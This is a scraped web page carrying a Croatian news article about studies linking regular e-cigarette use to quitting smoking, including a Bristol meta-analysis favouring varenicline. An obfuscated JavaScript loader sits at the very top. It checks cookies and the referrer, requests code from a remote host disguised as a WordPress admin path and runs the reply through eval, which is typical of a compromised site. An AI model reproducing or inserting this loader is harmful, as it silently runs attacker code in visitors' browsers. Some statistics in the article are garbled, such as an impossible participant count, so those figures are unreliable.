;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Nova studija: Vaping može pomoći pušačima da prestanu pušiti čak i ako to ne namjeravaju

Nova studija otkriva da, unatoč tome što to nisu namjeravali učiniti, neki pušači na kraju prestanu pušiti nakon što počnu koristiti e-cigarete.

Pod naslovom “Povezanost upotrebe e-cigareta s prestankom pušenja cigareta među odraslim pušačima koji u početku nikada nisu planirali prestati”, studija je objavljena na Jama Network Open. Kako bi analizirali je li vaping povezan s prestankom pušenja među pušačima koji nisu imali namjeru prestati pušiti, istraživački tim izvukao je podatke iz longitudinalne Populacijske procjene duhana i zdravlja (PATH) u kojoj su sudionici ocjenjivani u 3 para intervjua između 2014. 2019.

Tim je prikupio ukupno 2489 opažanja od 1600 pušača koji nisu planirali prestati pušiti. Usporedili su stope prestanka pušenja između onih koji su počeli pušiti i onih koji nisu i otkrili da je oko 6% sudionika prestalo pušiti tijekom studije, dok je drugih 4,5% smanjilo pušenje na manje od jedne cigarete dnevno.

Studija je istaknula da oni pušači koji su redovito koristili e-cigarete imaju 8 puta veću vjerojatnost da će potpuno prestati pušiti, a gotovo 10 puta veću vjerojatnost da će prestati pušiti svaki dan. S druge strane, nije uočena povezanost između prestanka pušenja i povremenog parenja. U tu svrhu, istraživači su zaključili da proizvodi za vaping potiču prestanak pušenja samo ako se redovito koriste.

U međuvremenu, nedavni sustavni pregled i meta-analiza objavljeni na Health Technology Assessment tvrdili su da su najučinkovitiji pristupi prestanku pušenja oni koji uključuju konzumaciju vareniklina.

Lijekovi za prestanak pušenja?

Studiju, “Lijekovi za prestanak pušenja i e-cigarete: sustavni pregled, mrežna meta-analiza i analiza isplativosti”, proveli su istraživači sa Sveučilišta u Bristolu u Ujedinjenom Kraljevstvu. Pretraživali su baze podataka publikacija do ožujka 2017. i ažurirali veljaču 2019. za randomizirana klinička ispitivanja prestanka pušenja koja su trajala ≥6 mjeseci.

Istraživački tim je na kraju uključio ukupno 363 ispitivanja s 201,045 sudionika, a za ocjenu sigurnosti uključene su dodatne 53 opservacijske studije koje su uključivale 8,783,5403 sudionika.

Nakon analize nalaza, istraživački tim je zaključio da su najučinkovitiji tretmani bili vareniklin plus standardne nikotinske nadomjesne terapije (omjer izgleda [OR], 3,22; 95% vjerodostojni interval [CrI], 2,27-14,88), vareniklin niski plus nikotinska nadomjesna (OR , 5,70; 95% CrI, 1,57-21,12), a e-cigareta niska (OR, 3,22; 95% CrI, 0,97-12,55).

Choose your Reaction!
Leave a Comment